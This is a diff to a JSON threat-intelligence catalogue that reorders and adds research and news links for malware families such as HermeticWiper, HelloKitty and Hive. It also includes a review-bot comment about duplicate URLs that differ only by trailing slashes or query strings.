 "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip",
 "https://cert.gov.ua/article/38097",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
 "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/",
- "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine"
+ "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya"
 ],
 "synonyms": [],
 "type": []
@@ -27430,8 +28723,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellobot",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html"
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt"
 ],
 "synonyms": [],
 "type": []
@@ -27444,28 +28737,28 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty",
- "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://twitter.com/fwosar/status/1359167108727332868",
 "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
- "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html",
 "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7",
- "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.ic3.gov/Media/News/2021/211029.pdf",
- "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/",
- "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
- "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/",
 "https://www.speartip.com/resources/fbi-hellokitty-ransomware-adds-ddos-to-extortion-arsenal/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
+ "https://www.ic3.gov/Media/News/2021/211029.pdf",
+ "https://twitter.com/fwosar/status/1359167108727332868",
 "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/",
- "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/"
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/",
+ "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
+ "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/"
 ],
 "synonyms": [
 "KittyCrypt"
@@ -27480,12 +28773,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth",
- "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
 "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability",
- "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
 "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
+ "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
+ "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
 "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
 ],
 "synonyms": [],
@@ -27525,9 +28818,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor",
- "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
 "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
+ "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html",
 "https://vblocalhost.com/uploads/VB2021-Slowik.pdf"
 ],
 "synonyms": [],
@@ -27541,16 +28834,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes",
+ "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
 "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.malwarebytes.com/blog/news/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day",
+ "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/",
+ "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
 "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
 "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
- "https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html",
- "https://www.youtube.com/watch?v=9nuo-AGg4p4",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
- "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/"
+ "https://www.youtube.com/watch?v=9nuo-AGg4p4",
+ "https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html"
 ],
 "synonyms": [],
 "type": []
@@ -27563,79 +28857,80 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/",
- "https://www.youtube.com/watch?v=mrTdSdMMgnk",
- "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://community.riskiq.com/article/9f59cb85",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/",
 "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/",
- "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html",
- "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
- 
"https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
 "https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/",
- "https://twitter.com/fr0gger_/status/1497121876870832128",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware",
- "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper",
- "https://twitter.com/threatintel/status/1496578746014437376",
- "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/",
- "https://dgc.org/en/hermeticwiper-malware/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
- "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://www.brighttalk.com/webcast/15591/534324",
- "https://eln0ty.github.io/malware%20analysis/HermeticWiper/",
- "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
- "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war",
- "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
- 
"https://www.englert.one/hermetic-wiper-reverse-code-engineering",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
 "https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html",
+ "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/",
+ "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://twitter.com/threatintel/status/1496578746014437376",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://www.youtube.com/watch?v=sUlW45c9izU",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
+ "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html",
+ "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
+ "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
+ 
"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/",
+ "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/",
+ "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations",
+ "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/",
+ "https://twitter.com/fr0gger_/status/1497121876870832128",
+ "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/",
+ "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine",
+ "https://www.englert.one/hermetic-wiper-reverse-code-engineering",
+ "https://dgc.org/en/hermeticwiper-malware/",
+ "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
 "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
 "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- 
"https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/",
- "https://brandefense.io/hermeticwiper-technical-analysis-report/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/",
 "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/",
- "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
- "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/",
- "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
- "https://www.youtube.com/watch?v=sUlW45c9izU",
- "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
- "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware",
+ 
"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
 "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/",
+ "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war",
+ "https://twitter.com/Sebdraven/status/1496878431719473155",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
+ "https://eln0ty.github.io/malware%20analysis/HermeticWiper/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://brandefense.io/hermeticwiper-technical-analysis-report/",
+ "https://community.riskiq.com/article/9f59cb85",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
+ "https://www.brighttalk.com/webcast/15591/534324",
 "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html", 
"https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
- "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/"
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/",
+ "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/",
+ "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/",
+ "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/"
 ],
 "synonyms": [
 "DriveSlayer",
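Review bot: The new refs list for win.hermeticwiper still carries near-duplicate entries that a normalising dedup step would collapse: `"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/"` (kept as context) next to the re-added `"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine"`, and the trustwave `overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war` URL both with and without a trailing slash. The win.hive hunk below shows the same pattern with the Talos `ransomware-chats.pdf` URL listed once bare and once with the `?1651576098` cache-busting query. Both pairs were already present on the old side, so this commit does not introduce them, but they presumably come through unchanged from the upstream data and the import could strip trailing slashes and query strings before deduplicating refs. Consumers that match on exact URL strings otherwise count the same source twice.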
@@ -27653,12 +28948,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard",
- "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://twitter.com/ET_Labs/status/1502494650640351236",
 "https://twitter.com/silascutler/status/1501668345640366091",
 "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://twitter.com/ET_Labs/status/1502494650640351236",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/"
 ],
 "synonyms": [],
 "type": []
@@ -27721,14 +29016,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee",
- "https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/",
 "https://www.msreverseengineering.com/blog/2018/9/2/weekend-project-a-custom-ida-loader-module-for-the-hidden-bee-malware-family",
- "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/",
 "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/",
+ "https://www.freebuf.com/column/174581.html",
 "https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/",
 "https://www.freebuf.com/column/175106.html",
+ "https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/",
 "https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/",
- "https://www.freebuf.com/column/174581.html"
+ "https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/",
+ "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/"
 ],
 "synonyms": [],
 "type": []
@@ -27742,13 +29038,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear",
 "https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html",
- "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring",
- "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
+ "https://twitter.com/struppigel/status/950787783353884672",
 "https://twitter.com/JAMESWT_MHT/status/1264828072001495041",
 "https://github.com/goliate/hidden-tear",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
+ "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
 "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/",
- "https://twitter.com/struppigel/status/950787783353884672",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
+ "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring"
 ],
 "synonyms": [
 "FuckUnicorn"
@@ -27763,9 +29059,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
 "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
 ],
 "synonyms": [],
 "type": []
@@ -27781,8 +29077,8 @@
 "https://twitter.com/MrDanPerez/status/1159461995013378048",
 "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
 "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://content.fireeye.com/apt-41/rpt-apt41/"
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -27818,17 +29114,30 @@
 "uuid": "d9f03a69-507d-4b1d-af6d-e76fca5952b7",
 "value": "HIGHNOTE"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hijackloader",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cbba3bc7-9491-402c-af3b-9a15b8bce122",
+ "value": "HijackLoader"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
 "https://attack.mitre.org/groups/G0001/",
- "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
 "https://www.recordedfuture.com/hidden-lynx-analysis/",
- "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
 ],
 "synonyms": [],
 "type": []
@@ -27880,47 +29189,49 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive",
- "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
- "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
- "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf",
 "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
